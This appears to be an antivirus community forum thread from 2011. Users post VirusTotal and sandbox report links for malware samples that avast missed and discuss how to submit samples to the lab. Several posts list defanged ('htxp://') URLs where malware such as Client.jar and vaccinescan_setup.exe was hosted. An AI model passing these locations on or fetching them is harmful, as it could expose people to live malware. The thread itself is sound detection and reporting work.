http://www.virustotal.com/file-scan/report.html?id=dc6261c9d0b8d0f486ce55f8d191b96439007569df516087412cd3fb00462350-1301111394
This one is detected
There is a more up-to-date report (13/42) for this file.
-
Detection for vaccinescan_setup.exe as mentioned by danny96,
http://www.virustotal.com/file-scan/report.html?id=dc6261c9d0b8d0f486ce55f8d191b96439007569df516087412cd3fb00462350-1301111394
avast detect since:
http://www.virustotal.com/file-scan/report.html?id=dc6261c9d0b8d0f486ce55f8d191b96439007569df516087412cd3fb00462350-1301236936
But from this domain this is still up: htxp://down.vaccinescan.co.kr/app/down/vaccinescan_setup.exe
virustotal result: http://www.virustotal.com/file-scan/report.html?id=bf12984f90b2c8afb8f3b5a5149eabc9c979a61736b2f414d444b6903a4135d3-1301226435
and
http://www.virustotal.com/file-scan/report.html?id=dc6261c9d0b8d0f486ce55f8d191b96439007569df516087412cd3fb00462350-1301080931
ThreatExpert analysis: http://www.threatexpert.com/report.aspx?md5=41216f1f6e0358eaadd1d6782963e330
This new variant not detected ny avast
See: http://camas.comodo.com/cgi-bin/submit?file=bf12984f90b2c8afb8f3b5a5149eabc9c979a61736b2f414d444b6903a4135d3
and http://camas.comodo.com/cgi-bin/submit?file=dc6261c9d0b8d0f486ce55f8d191b96439007569df516087412cd3fb00462350-1301080931
description: http://www.norman.com/security_center/virus_description_archive/79262/nl (norman detects this
malware)
polonus
-
This malware resides here: htxp://youtub.hi2.ro/Client.jar (JAVA_DLOADER.VTG)
See: http://www.virustotal.com/file-scan/report.html?id=35970e91c4d3364f8b05f5b40d892224084c7fc207af4db8165ebf6ca9bd5357-1301338614
See: http://wepawet.iseclab.org/view.php?hash=145d4e3fc6a7adc87d664b817fa57f08&t=1301342685&type=js
also found here: htxp://86.96.195.185/Client.jar
http://www.virustotal.com/latest-report.html?resource=a6091a6335ec1fd34e8358010c044270
&
htxp://bejn.fileave.com/Client.jar
http://www.virustotal.com/latest-report.html?resource=0521c911e442cd9eec927d8439731a76
&
htxp://80.74.139.159/joomla1/tmp/sernac/cl/informes/Client.jar
http://www.virustotal.com/file-scan/report.html?id=35970e91c4d3364f8b05f5b40d892224084c7fc207af4db8165ebf6ca9bd5357-1301339415
&
htxp://www.tinyology.eu/biliard/Client.jar
http://www.virustotal.com/file-scan/report.html?id=35970e91c4d3364f8b05f5b40d892224084c7fc207af4db8165ebf6ca9bd5357-1301339415
polonus
-
http://virusscan.jotti.org/en/scanresult/397d3a1752993f12d11499c860944b2fa3b923c5
http://virusscan.jotti.org/en/scanresult/d7929e26d39b47efdf14bc6848601ba81b312129/4b736f82be65d609f35f17e2785cd78047059860
http://virusscan.jotti.org/en/scanresult/5ab878a34f0ccc12367fcdd76af6a6e33c3346d2/57cbac84f39be03486b7d849bfdeb89bb4b1ab7b
http://virusscan.jotti.org/en/scanresult/6089fb91fbeb68c3bdf024c43f1f8fcd3c75884f/abfe303db49b96d3b83fff02e27de2cc2211c4bd
http://virusscan.jotti.org/en/scanresult/53a76d9807b6f542263639c14362087cd00b6192
http://virusscan.jotti.org/en/scanresult/a41f5aa76ceb8da0b2442f5aedc08487d46fff2d
http://virusscan.jotti.org/en/scanresult/51227e87ab211b9870023fadf3014200b6fda9f8
sent to avast!
-
Thanks Burkoff for helping improving detection :)
-
Another one here: https://www.vicheck.ca/md5query.php?hash=43cb55861b7fcf1dfb6968c9ef110bcc
with VT results here: http://www.virustotal.com/file-scan/report.html?id=d4abc27a80312e066fc816e537394a33719b8ac11f5d277dc26f88a899548dad-1304483504 new Spy.Spyeye variant...
polonus
-
Is this being detected, see: http://wepawet.iseclab.org/view.php?hash=a0beb67f63645e5251c6df9bd5334ab0&t=1304632923&type=js
See: http://www.virustotal.com/url-scan/report.html?id=81647288eaf692b562bedd017aa95f67-1304625248
webshield should flag Java Deployment Toolkit
polonus
-
Sample missed: http://www.virustotal.com/file-scan/report.html?id=ee2b6faa5ea31285a57b75e529f1592b07d97ba6988bf51fcacd44a8e6014f65-1304121091
and
http://www.virustotal.com/file-scan/report.html?id=73cd5020efbb972ab0231236db98c3de225c06c4d4378747426527a1685c965a-1304339382
pol
-
this http://www.virustotal.com/file-scan/report.html?id=550efefe40429ccada456de083bad2a31d1400868bc25bc7cdc0dd2d96559d6d-1304673863
infects xp, undetected by avast, runs fake fraud security program and disables avast
spybot sd was able to clean it out
-
As the title indicates this is for VT links only not the posting of file sharing for malware samples.
They should be sent directly to avast, as you have no control over who might access this link nor what they might do with the sample. So please remove the link.
Send the sample/s to avast as a Undetected Malware:
Open the chest and right click in the Chest and select Add, navigate to where you have the sample and add it to the chest (see image). Once in the chest, right click on the file and select 'Submit to virus lab...' complete the form and submit, the file will be uploaded during the next update.
Or
Send the sample to virus (at) avast (dot) com zipped and password protected with the password in email body, a link to this topic might help and undetected malware in the subject.
-
http://www.virustotal.com/file-scan/report.html?id=e2781ec26cc64f0607722627fab60816a3c160901d778fb463d1bec7a4d7f251-1305104212
http://www.virustotal.com/file-scan/report.html?id=f9fa550003521926e1d94413b3399f25bec11f96a232850211481a61c87d751e-1305035502
Sent.
-
Not detected by avast: http://www.virustotal.com/url-scan/report.html?id=641577c40b41da0a4e98c73f67524f04-1305137300
see: http://www.virustotal.com/file-scan/report.html?id=971c34a0b571d4a8da79b7d8cf52296a54ce18d9e6bff670b80c97dd4d603924-1305144526
polonus
-
http://virusscan.jotti.org/en/scanresult/d3619aff5e94ad739f3986992d537f58cb604b0f
and others sent to avast!
-
Was this the same malware as scanned here: http://www.virustotal.com/file-scan/report.html?id=ae090428cb05c1d951e1641d0471b6533a5bda75db1c557cca057a3372d0336b-1305526099
reported to VT as Necurs rootkit with funny blacklist by VT Community User EP_XOFF
Kaspersky does not detect it at the VT scan of May 16th last,
polonus
-
Was this the same malware as scanned here: http://www.virustotal.com/file-scan/report.html?id=ae090428cb05c1d951e1641d0471b6533a5bda75db1c557cca057a3372d0336b-1305526099
reported to VT as Necurs rootkit with funny blacklist by VT Community User EP_XOFF
Kaspersky does not detect it at the VT scan of May 16th last,
polonus
http://www.virustotal.com/file-scan/report.html?id=ae090428cb05c1d951e1641d0471b6533a5bda75db1c557cca057a3372d0336b-1305708308
-
http://www.virustotal.com/file-scan/report.html?id=ed19b58dc831d9b29d0cbb759be5f262df9723520308dcb1b7fb693f15f90ceb-1305800557
http://www.virustotal.com/file-scan/report.html?id=9976d50ad3d38cca91096a062a69875efc5758d6da8fe5ddbd7fa4f432deb1f3-1305794383
http://www.virustotal.com/file-scan/report.html?id=4012f175141859ccf79b82ff434b3bc78802ed276e99a75f97ce9c6f1ee9b8cf-1305800901
http://www.virustotal.com/file-scan/report.html?id=2caa418b31686dd8213a7b7ab5e8e965c612f68371be4d5a2b738d83f6449097-1305801522
http://www.virustotal.com/file-scan/report.html?id=5397a8aed08dc72b352c5f0d85d24f9e5cbb6028723860b8b1c6fd9dbe460b11-1305801694
http://www.virustotal.com/file-scan/report.html?id=5e8bf5047362c4d6e0abfb2439b80f02a93d80393322400fab9c48c4e7eb9590-1305801771
http://www.virustotal.com/file-scan/report.html?id=503d885e8f84d9fb3f2bf0d306c1270413e6450987076216f72779bc9215a469-1305801899
http://www.virustotal.com/file-scan/report.html?id=5a09cae05fe28d6067d516b045e9a646ebdf6a3c50cb5abd41c97b101968e5e4-1305801988
http://www.virustotal.com/file-scan/report.html?id=94105bafc9f65fd8b0585e75fe56046ef3f722be3253c2461fc79dee48945258-1305802096
http://www.virustotal.com/file-scan/report.html?id=9688c395c810e7d42ae0f1adad18ac580a72515fd467d4ca8de021137c0384f0-1305801674
http://www.virustotal.com/file-scan/report.html?id=d7e359f175b09f40ae19c4d58d22d4e5dfd3514aae36a810590059a39d5110d9-1305802429
http://www.virustotal.com/file-scan/report.html?id=1232441fc19e1699a5bb0e1fa8a1b512e34c12e115e5888c06336c14f0847188-1305801996
http://www.virustotal.com/file-scan/report.html?id=4ee4be381b51c96db49ea85b6db9d3fdcad5a705ae79d128e61523f3d58e6730-1305802579
http://www.virustotal.com/file-scan/report.html?id=1664f32dbd501190884bd2dedb15c5dc092fa057406592fa01ce7fc795695e3b-1305802676
http://www.virustotal.com/file-scan/report.html?id=72050a447bea7c7138080b931b885eb253eaa30598a2cad421cfd6e35c67386f-1305802745
http://www.virustotal.com/file-scan/report.html?id=bfae2d6eb055defad1a1ceb00d35f125cc7d6c59f1c04e42a901f52a1f0c7169-1305802295
http://www.virustotal.com/file-scan/report.html?id=d0ace36fd1326700a0f65c2d66a7193e5516b55760869f7689d7158b2dc376bc-1305802885
http://www.virustotal.com/file-scan/report.html?id=73960394a70b102c8484afda811a7b9420df960cface8647bfbe35f327726f47-1305802472
http://www.virustotal.com/file-scan/report.html?id=dd4180ea68df45fa0e210ce089b250a34d32e73dc677894a4466081a397b5547-1305803054
and others sent to avast!
-
http://www.virustotal.com/file-scan/report.html?id=137e9afb4c49ceab45fff506f5a92b5cddedcac1694adcd5eb6b962d28dce5c1-1305819545
-
Hi DCS,
Similar malware not detected here: http://www.virustotal.com/file-scan/report.html?id=02fbee1adf9167199c07a27deede89f8db8710aed06fd3ffca9fe102ffeb5a72-1305737459
polonus
-
http://www.kernelmode.info/forum/viewtopic.php?f=16&t=625
http://www.securelist.com/en/blog/11266/Rootkit_Banker_now_also_to_64_bit
-
http://www.virustotal.com/file-scan/report.html?id=dfbdaf4621aa82cf142b02d2d4011fec8f3a1e942954949139791e963056ba41-1305977721
http://www.virustotal.com/file-scan/report.html?id=8b71c8e4bddef1b145b824365de43b2fe9b837a55b024448a578ef31bb334659-1305978627
sent to avast! ;D
-
Another one here: http://www.virustotal.com/file-scan/report.html?id=fad4568347cc738715f369841c75c64c574a459ff232fc721de62fd6e9daf077-1306087743
a TR/Crypt.ZPACK.Gen variant detection...
polonus
-
VT scan result: http://www.virustotal.com/file-scan/report.html?id=d602509ad79860b3d019d90626836da344b09a24c28868347333ea6244fcae68-1305067609
and here:
http://www.virustotal.com/file-scan/report.html?id=d60d11aaaf0f89f77563cc49cf4e1deebb7f34b00353aee5f9512a8ddcb60a44-1303985474
See for malware: http://tools.sucuri.net/?page=tools&title=blacklist&seeall=1&detail=591226c1fb8da24e59e4e238bf8606ce
polonus
-
Hi Burkoff,
[SOLVED]
We have detection here: http://www.virustotal.com/file-scan/report.html?id=8b71c8e4bddef1b145b824365de43b2fe9b837a55b024448a578ef31bb334659-1306258405
and
http://www.virustotal.com/file-scan/report.html?id=dfbdaf4621aa82cf142b02d2d4011fec8f3a1e942954949139791e963056ba41-1306151345
Means avast users are now being protected,
polonus
-
Below are just a few from a personal collection of mine over the years to find to my amazement, Avast is missing out on some fun. Now I do have to state I do like Avast and enjoy using the product, however I am sad to see things like this occur. I have submitted several of these files to the lab time and time again to find no new changes in my scans. I hope we can refrain from insulting me for my huge post here and maybe work together as a community and solve this lack of detection. If you care to view the links, Please take note on the Dates on all of them. I think you will be in for a good one.
Until next time,
Shaggie.Rydez
___________________
http://www.virustotal.com/file-scan/report.html?id=07fcc10185ff940d84a6ce10cd9dcb459a9316a472209e27f5bf835ca90abe20-1306744067
http://www.virustotal.com/file-scan/report.html?id=783a565ae5b4facf66622acb2ede3b11dadf655a4ef66bdd02feb0fc2224b770-1305044090
http://www.virustotal.com/file-scan/report.html?id=54c1d5e2059f880f76c361b18f3c5d93ef188e41e82c5ccc4c0b96830ceef7e0-1305296788
Setup-trial.exe: submit by Shaggie.Rydez
http://www.virustotal.com/file-scan/report.html?id=cb9f592aa5dd134775c4c4a2599701c696e102d9f4b647530bcacc3558ae76c9-1306744525
http://www.virustotal.com/file-scan/report.html?id=9f2864435b39e128e0a4b8a81308461d014fbecb67a380ea215c3418ecc3c70d-1305755334
http://www.virustotal.com/file-scan/report.html?id=8281f06cc07dd377ecf78d9f1e435679f4b27f2d3f4f9ea727027e56e0e57b5f-1303293776
https://www.virustotal.com/file-scan/report.html?id=9529d01c9488ca48735610b8fe3a9be3f4749952b68e6e23fd1b0a62b8390250-1300057230
EXEfile.exe: Submit by Shaggie.Rydez
http://www.virustotal.com/file-scan/report.html?id=1cff9194f37821f0141abab28afb08c36b0e8e795e6f766f400b7acaa95e4d64-1306745273
BE.exe: Sumbit by Shaggie.Rydez
http://www.virustotal.com/file-scan/report.html?id=ac4be6281d33f22c652083d88488892c0f7260b75b61f0ca519e7970dc9672a8-1306745910
antieta.zip: Submit by Shaggie.Rydez
http://www.virustotal.com/file-scan/report.html?id=3abce78c97f8a0fe9d4b3df48d91a425bf70eaae8db9a8c1f5b354fd72c67389-1306746581
Cih 14.zip: Submit by Shaggie.Rydez
http://www.virustotal.com/file-scan/report.html?id=e323f74fbc4c8b4855be2f08c340cbde3c3f5461b1af46bc7581930a568bbf05-1306746160
kompanio.zip: Submit by Shaggie.Rydez
http://www.virustotal.com/file-scan/report.html?id=3eabaab7a9914299abe3526586f70a038c770add1d4580031036b1fa8a1d60d9-1306746233
No Pasaran.zip: Submit by Shaggie.Rydez
http://www.virustotal.com/file-scan/report.html?id=433817e21202769645877386b8506b6be907ceb23ae1c7854b7826ef4d6cddd5-1306746829
nukeviruses.zip: Submit by Shaggie.Rydez
http://www.virustotal.com/file-scan/report.html?id=2d41e0c82f548fc09b972bbcdc19cc39660f548303b8c647788cc96fb1ded201-1306746884
ontario3.zip: Submit by Shaggie.Rydez
http://www.virustotal.com/file-scan/report.html?id=7deea85ae2d59f4b886a00e89f423833ea218ea16530ee745de0d6329d8dbd51-1306746422
v100.zip: Submit by Shaggie.Rydez
http://www.virustotal.com/file-scan/report.html?id=b79d7f4a2ff942479d562da6197fa983d953aa1b526e22a4dcbb98db3bb53f41-1306746497
virus.zip: Submit by Shaggie.Rydez
http://www.virustotal.com/file-scan/report.html?id=fba9f3edc6f9931fe9070ebbef0ef0114ff88d91b8f2f645dbd21280921640f4-1306747143
wpart_c.zip
http://www.virustotal.com/file-scan/report.html?id=02519abf272a415583bce7e45b8abe0ae70d7e160351b11b692ab01b7fb32933-1287410138
-
send undetected samples to virus @ avast.com in a password protected zip.file
Mail subject: undetected sample(s)
Password: infected
-
Below are just a few...
Thanks for reporting/helping..!
Btw, interesting: Some of these samples are dedected by old avast, but not by the new one..???
-
Below are just a few...
Thanks for reporting/helping..!
Btw, interesting: Some of these samples are dedected by old avast, but not by the new one..???
I am guessing....bc they are malware that only works/will harme older OS.... not supported by latest avast, so why detect
-
I am guessing....bc they are malware that only works/will harme older OS.... not supported by latest avast, so why detect
Well, maybe...
-
googled a bit.... the second last sample...this is just a name search, not MD5
http://www.virustotal.com/file-scan/report.html?id=fba9f3edc6f9931fe9070ebbef0ef0114ff88d91b8f2f645dbd21280921640f4-1306747143
Virus.DOS.PS-MPC.2832Detected
Oct 02 1998 20:00 GMT
Released Oct 02 1998 20:00 GMT
http://www.securelist.com/en/descriptions/old16509
if you scroll down, you find the avast detection name from the VT scan
-
This thread should be pinned for easy reference! It is a great resource! Thanks Avast!
Jack
-
New bancos variant detected: http://www.virustotal.com/url-scan/report.html?id=fece6f14a975a38232e01066097d6dab-1306760379
File detection VT: http://www.virustotal.com/file-scan/report.html?id=84906f0069350234d413f8c89aba48ec9543ea027adda400cba4c9fd5f8b0227-1306767585
polonus
Detection here: http://www.virustotal.com/file-scan/report.html?id=84906f0069350234d413f8c89aba48ec9543ea027adda400cba4c9fd5f8b0227-1307115470
-
I have submitted several of these files to the lab time and time again to find no new changes in my scans.
This worries me... I believe avast team has a good and hard effort to improve detection and probably your samples aren't in the wild... But should we wait that much? Does it worth submitting?
-
Avast does not detect: http://www.virustotal.com/file-scan/report.html?id=4719f84d5d67d29fd8cdb24147ed303b75b93dfaeee7ba6fffd2b63d3fc10420-1307819072
See:
http://www.virustotal.com/url-scan/report.html?id=fede0daafc9754597fd358fb662331ba-1304017674
Trojan gen erci1.exe (on the sacour dot cn/list of malicious URLs
polonus
-
http://www.virustotal.com/file-scan/report.html?id=4cd097131daffef84e6a038c0667d89a8bce5fdf55b1782e139cd706836d5cd3-1307807203
http://www.virustotal.com/file-scan/report.html?id=20a265379b06f20df28d452200b6ec517c2f8eb99827dfed3c50965e32e226cb-1307812518
http://www.virustotal.com/file-scan/report.html?id=14738c45344e8cddb6c1ceb9aaa4734a8b9bf94f8bcf062902a422153c65cecf-1307813175
http://www.virustotal.com/file-scan/report.html?id=c5ed637fa9da0eac54353d35ed49377d7ad3e9c9c02d980ea6d5577312713ae2-1307813398
-
Presumably you have sent these samples to avast, as just sending them to virustotal isn't very effective at all.
-
From virustotal FAQ
In exchange for providing an antivirus engine you will receive all files submitted to VirusTotal that are not detected by your product and are detected by at least one other antivirus, along with their corresponding VirusTotal reports.
So avast will get the files if I submit them or not.
-
So avast will get the files if I submit them or not.
Yes, but it could take a while.
It's always better to submit it directly to the avast! av lab.
-
So avast will get the files if I submit them or not.
Yes they do, but a) it takes time and b) they also get a lot of chaff with the wheat/samples, as has been mentioned in the forums. So it is going to take longer to sort that wheat from the chaff to get the benefit, direct submission to avast is quicker.
-
Hi folks,
This one not yet detected by avast: http://www.virustotal.com/file-scan/report.html?id=75153fa12146d3505d83dda9fb2ae5cedc085f0360adad5640bfe29a2e14c6f1-1307976186
See: http://www.threatexpert.com/report.aspx?md5=5e27d125661e91796759b542c59240d3
See: http://www.garyshood.com/virus/results.php?r=5e27d125661e91796759b542c59240d3
Is the Trojan horse TR/Crypt.FKM.Gen..Fraudtool
Malware link forwarded to virus AT avast dot com
polonus
-
Hi folks,
This backdoor,... keys.jpg - ALERT: [PHP/BackDoor.D] keys.jpg
Contains detection pattern of the PHP virus PHP/BackDoor.D,
not detected by avast: VT scan: http://www.virustotal.com/url-scan/report.html?id=c1d19d8a76b2fb50290f6afd3a04b067-1308160512
file detection VT:
http://www.virustotal.com/file-scan/report.html?id=7c55c7b55c745d07ea75c2b944eb6a4ff57447bbc005e7d669851178c48505b6-1308167744 16/ 42 (38.1%)
polonus
-
Hi forum friends,
This sample not detected by avast yet: http://www.virustotal.com/file-scan/report.html?id=1ee330f81e3999a8bfdf95461ccf7052eac3ba04e2b061e7822f90f9fcb3e714-1308408426
generic malware
File hash: 9cd70492ad620bb922ad0bb815708c5a
See: http://vscan.urlvoid.com/analysis/9cd70492ad620bb922ad0bb815708c5a/cmVhZG1lLWV4ZQ==/
&
See: http://www.threatexpert.com/report.aspx?md5=9cd70492ad620bb922ad0bb815708c5a
Sent to virus AT avast dot com
polonus
-
uploaded to avast / MBAM / SAS ;)
http://www.virustotal.com/file-scan/report.html?id=1b95fd5c45a1314f4abf593ce012f413f017b93949af506f7a8e85bd3fe79c71-1308425693
http://www.virustotal.com/file-scan/report.html?id=5cae17ca820c5a818e0648cf9de76ad1cc2a7c997c51f8912b67bcdd53b343ed-1308425362
http://www.virustotal.com/file-scan/report.html?id=91eda36708ce8277e84fcbecfb65dfb5e81c0f9ea0e89c70cd38872a66104601-1308425376
http://www.virustotal.com/file-scan/report.html?id=64dfb39015b938dca3e510b1eb3ba08a8535e830abe8ecbfcd2f3d1e765bae41-1308425387
-
Hi Pondus,
Can this have been a different variant, seen to the MD5 hash?
http://file.virscan.org/report/842711ae4167a3045aee49d8b9b43567.html
See: http://anubis.iseclab.org/?action=result&task_id=1b48f9caf85a67c142906d1ed5ed7893a&format=html
polonus
P.S. And this one: http://www.virustotal.com/file-scan/report.html?id=d6edb11340619afb783ff8086f64c4ecb6733373d26ec57d23432318b8791423-1308412278
-
sure looks like it.....not same MD5
ThreatExpert report on the first sample
http://www.threatexpert.com/report.aspx?md5=2c2d488d727589158f907dd36c04eb9e
-
Missed by avast redirect to Zeusv2, see: http://www.virustotal.com/url-scan/report.html?id=645dbea8d0d2249d2a3be5f523f28f36-1308487354
and http://www.virustotal.com/file-scan/report.html?id=a4888546e938c43404b307e6416fcaaa06cf7363d94efed5cfbd491280f564ab-1308494558
also re: http://wepawet.iseclab.org/view.php?hash=645dbea8d0d2249d2a3be5f523f28f36&t=1308494638&type=js
and accompanying Anubis report:
http://anubis.iseclab.org/?action=result&task_id=1947012aa7e40552481eed1a3ec1d6ad9
Info forwarded to virus AT avast dot com
polonus
-
This malbanker malware, Winsanta.exe not detected by avast, see:
http://www.virustotal.com/file-scan/report.html?id=51f4d16f405ec3d5b7b16d2528a0718613acceb3b03e7e1e4b33fd987350b40b-1308482476
Threatexpert analysis: http://www.threatexpert.com/report.aspx?md5=47ba243c524c6a978a53d36f73663a66
polonus
-
Generic trojan mot detected by avast, VT: http://www.virustotal.com/url-scan/report.html?id=097498da46f8ac24e7b4407db4ffa237-1308588739
File analysis at VT: http://www.virustotal.com/file-scan/report.html?id=0b8a79442001bede8cd3ff233a296e5868cfa48ae6a52b903f46d05e5f91135d-1308596320
See Anubis report: http://anubis.iseclab.org/?action=result&task_id=10a02c524dadf2b942dcdd8b155f0baea
polonus
-
Hello
This malware was shutting Avast down especially it seemed while Avast was updating or scanning.
http://www.virustotal.com/file-scan/report.html?id=0ed55ae8fc6d7ff2dc4a5175b644f5fc6068c257ceaaf5f2b47e392b786bd1f9-1308641359
emailing sample to virus(at)avast
The file name is system32StopAllWorw.exe but not sure what its classified as (trojan, backdoor etc)
Thanks for great Antivirus software!
Grant
-
Thanks for submitting grantdb.
Malware that kill the antivirus must have special attention imho.
-
Hi here is the behaviour summary for this: http://xml.ssdsandbox.net/view/334fa2a25a6097143f540b26dd13878b
Can also come as part of downloaders:
e.g.
Look up at ViCheck.ca and get VT results: http://www.virustotal.com/file-scan/report.html?id=e548a71809e0c66deca4aa92752021c1dfa4db2f8deb95b8ba588c2d2abfc51a-1241488981
avast detects...
.\system32stopallworw.exe
6.0.2900.3156
Microsoft Corporation
efd496c8e5507f188e47df4edbc91aa9 = MD5hash
.\system32stopallworw.exe
6.0.2900.3156
Microsoft Corporation
407364a0c3ebd0b544d8689c45383935
\system32stopallworw.exe
6.0.2900.3156
Microsoft Corporation
3c41382942fb749fd6f1f2144e2e9dca
..\system32stopallworw.exe
6.0.2900.3156
Microsoft Corporation
1db8c421b4fa7bfcddcc14bd38f5c89c
.\system32stopallworw.exe
6.0.2900.3156
Microsoft Corporation
12cc1b486051536d9ffa7b3459cb745d
polonus
-
Undetected malware
1:http://www.virustotal.com/file-scan/report.html?id=8c16baa04cd8055ffb228cf152a03724cb80fccfbd7f39853af6d08217986ad7-1308667154
Sent to Avast team/lab
-
Fake antivirus that are not detected by avast
http://www.virustotal.com/file-scan/report.html?id=361d27adc51258db9e3e50858d592dbd6b236aeece3568993a768b255c1b2c6f-1308927934
http://www.virustotal.com/file-scan/report.html?id=d8b361811b4e12bc1e292b074f6cd6150d0f5e45b49ba0912043b8e2eec9a62e-1308928565
http://www.virustotal.com/file-scan/report.html?id=89ee3e6255ec44d1ef7ba3a746d49eecdf860c851c0ac8c0c7631f00fb614221-1308928781
-
Fake antivirus that are not detected by avast
<snip>
If you haven't already done so - Send the sample/s to avast as a Undetected Malware:
Open the chest and right click in the Chest and select Add, navigate to where you have the sample and add it to the chest (see image). Once in the chest, right click on the file and select 'Submit to virus lab...' complete the form and submit, the file will be uploaded during the next update. Note: manually adding to the chest doesn't remove them from the original location, so they still have to be dealt with in that location.
Or
Send the sample to virus (at) avast (dot) com zipped and password protected with the password in email body.
-
Sample send within Chest
http://www.virustotal.com/file-scan/report.html?id=776e3536e987359be4a2d5c7efb1f65e559778695864d1831d97ae74081d1f4c-1308940105
-
Hi Tech,
Is there a non-malcious variant of this here?
See: http://www.virustotal.com/url-scan/report.html?id=a755004c90acd2e1099ba75185c1a5fc-1308940633
and
http://www.virustotal.com/file-scan/report.html?id=bc9aeb88f809962165852b080f08a812d00880727f4877af8e8ffebc143d576a-1308947839
See: http://wepawet.iseclab.org/view.php?hash=a01a1b7802760698bb8bbf65a887917d&t=1308948344&type=js
polonus
-
Thanks Polonus. Just that browsing to learn about the software, I get the link for the malware :)
-
undetected malware
http://www.virustotal.com/file-scan/report.html?id=ae98df37be7d00d3dc3c79c7dd2688d8b2be463963795861f36e482dbd3e79c9-1308946250
Sent to Avast lab
-
submitted to AVAST for more than a week
26/ 42 (61.9%)
http://www.virustotal.com/file-scan/report.html?id=593d8db1d08e10421b66cf8cb74ded2c270d382b3bd7f054a89ef8e7b630543f-1309016384
14/ 42 (33.3%)
http://www.virustotal.com/file-scan/report.html?id=8daef7d62192465bfb791d37cc1f9324444a13e4654e015fd3dc239def5910bb-1309016894
-
Hi dirk0914,
This could be because the first mentioned malware is no longer online, see: http://anubis.iseclab.org/?action=result&task_id=1a04231d0da67a47471f1fea01df87605 which report was generated 2010-12-23 05:50:01
polonus
-
Detection missed by avast for MSIE ADODB.Stream Object File Installation Weakness attack,
VirTool:JS/Obfuscator.BN aka JS/Kryptik.AX
see VT scan results: http://www.virustotal.com/url-scan/report.html?id=aa04e02c6fa3b44f7a7dc063330d9ec7-1309030299
and
http://www.virustotal.com/file-scan/report.html?id=a42e2ac81838ff31355994d743e0a6510d9ae295634f208b83ec891def1b587b-1309037894
polonus
-
undetected malwares
http://www.virustotal.com/file-scan/report.html?id=bf63ba64f31b09c0656e46beb967e8481816231aa0c59b2d87d959b278942972-1309102892
http://www.virustotal.com/file-scan/report.html?id=2774ecc4438de853e0e38481cce23d19f0c6c7cd5e100ad8692e491e36ef2075-1309105498
http://www.virustotal.com/file-scan/report.html?id=4192374526b17ab2b821a0c150ea11386bbc04163b85b178ce83115a5b150236-1309107430
http://www.virustotal.com/file-scan/report.html?id=b9625af9bd04030c711749e0ad8f434cba5078c771e1b34142b9671dab7f04d2-1309108498
http://www.virustotal.com/file-scan/report.html?id=9f2864435b39e128e0a4b8a81308461d014fbecb67a380ea215c3418ecc3c70d-1309109784
Sent to Avast lab/team
-
How do you go about sending files to avast?
-
How do you go about sending files to avast?
You can send samples from the chest.
Or send them compressed to: virus(at)avast.com
-
How do you go about sending files to avast?
You can send samples from the chest.
Or send them compressed to: virus(at)avast.com
Gmail won't let me send you the file.How do I upload the files to the virus chest?
-
never mind figured it out myself.
http://www.virustotal.com/file-scan/report.html?id=9ed0034f82e0f7ad4f9598576c42c10c5e5da8ba73c3308b7705320e7f3e4c3c-1304343770
http://www.virustotal.com/file-scan/report.html?id=3c9a790d8f31eaf058f0b1fd2be3e972a1c2614472bfa86babfdc51b44728f6e-1309170404
-
Gmail won't let me send you the file.
Sorry, I forgot to mention that you should also password protect the file.
-
Sorry, I forgot to mention that you should also password protect the file.
If the user is making a .zip file, passworded or not, GMail will block.
You need to use .7z file (http://www.7-zip.org/).
-
If the user is making a .zip file, passworded or not, GMail will block.
You need to use .7z file (http://www.7-zip.org/).
Really..??
Well, I never used GMail...
-
undetected malware(s)
1: http://www.virustotal.com/file-scan/report.html?id=10a601f7f5b8e44dfd6633a94db6c6e12b75146b69c53bb35d50e5aa85f33265-1309184204
2: http://www.virustotal.com/file-scan/report.html?id=adff768f7edc9ef282eb192192eddc23adf9514b70fd819089e28f286419f1fb-1309186297
Sent to Avast lab/team
-
If the user is making a .zip file, passworded or not, GMail will block.
You need to use .7z file (http://www.7-zip.org/).
Really..??
Well, I never used GMail...
True ;) Use Hotmail instead. (If you have it)
-
undetected malware
1: http://www.virustotal.com/file-scan/report.html?id=9028e78d09567870788282a8ba7b58f85cc6b0151ef42194cf4880af9a297d84-1309199548
Sent to Avast lab/team
-
Hi folks,
Reported to avast previously: http://www.urlvoid.com/scan/i.cr3ation.co.uk
, but still no detection for the malware there: http://www.virustotal.com/file-scan/report.html?id=58fff56d2bc9ac02bf5c0a0d8ce8df9a7b9e47ced7fee3c2d79a952096afe8b4-1308867951
Anubis report here: http://anubis.iseclab.org/?action=result&task_id=136e7e4785ba99324b10d803b55bcf29b
http://www.threatexpert.com/report.aspx?md5=383b7a245c4f23699c652a050025a3b9
See: http://forum.avast.com/index.php?topic=78701.0
polonus
-
If the user is making a .zip file, passworded or not, GMail will block.
You need to use .7z file (http://www.7-zip.org/).
Really..??
Well, I never used GMail...
It does not matter because I figured out how to load it into the virus chest and submit the files to you guys
-
undetected malware
1: http://www.virustotal.com/file-scan/report.html?id=cd6771c37d8473837edd546dd92a57e84976c91973ee5a02ac2788024b167190-1309378612
Sent to Avast lab/team
-
Malware here or not? So report has been sent to virus at avast dot com
VT results: http://www.virustotal.com/url-scan/report.html?id=c53b9f81a4ea232afa473180c8943a07-1309371901 (4 gave malware site)
Nothing found here here: http://www.virustotal.com/file-scan/report.html?id=97c6bf9b71d07503d784366498bed19dda9a37b1fe332e1cfbba2e4e6a7f3959-1309379521
and at sucuri: site scan gave an all green
Now see this analysis: http://wepawet.cs.ucsb.edu/view.php?hash=c53b9f81a4ea232afa473180c8943a07&t=1309380172&type=js
Particularly see this scan analysis: http://anubis.iseclab.org/?action=result&task_id=1137cec51f97233b49dd9eb35b34f26c9
I.m.h.o. this code has a backdoor trojan mutex! see: DDrawDriverObjectListMutex
polonus
-
Malware here or not?
Report 2011-06-30 09:41:41 (GMT 1)
Website twistermp3.com
Domain Hash b20cdc9f7cc85ad25ffbd0540bbe8c38
IP Address 50.22.41.94 [SCAN]
IP Hostname 50.22.41.94-static.reverse.softlayer.com
IP Country -- (--)
AS Number 36351
AS Name SOFTLAYER - SoftLayer Technologies Inc.
Detections 5 / 23 (22 %)
Status DANGEROUS
http://hosts-file.net/?s=twistermp3.com
http://www.mywot.com/en/scorecard/twistermp3.com
http://www.malwareblacklist.com/searchClearingHouse.php?search=twistermp3.com
http://global.sitesafety.trendmicro.com/
http://www.websecurityguard.com/results.aspx?qkw=twistermp3.com
-
If the user is making a .zip file, passworded or not, GMail will block.
You need to use .7z file (http://www.7-zip.org/).
Really..??
Well, I never used GMail...
7Z or RAR or every other compress format which encrypt file names ;)
-
Undetected malwares:
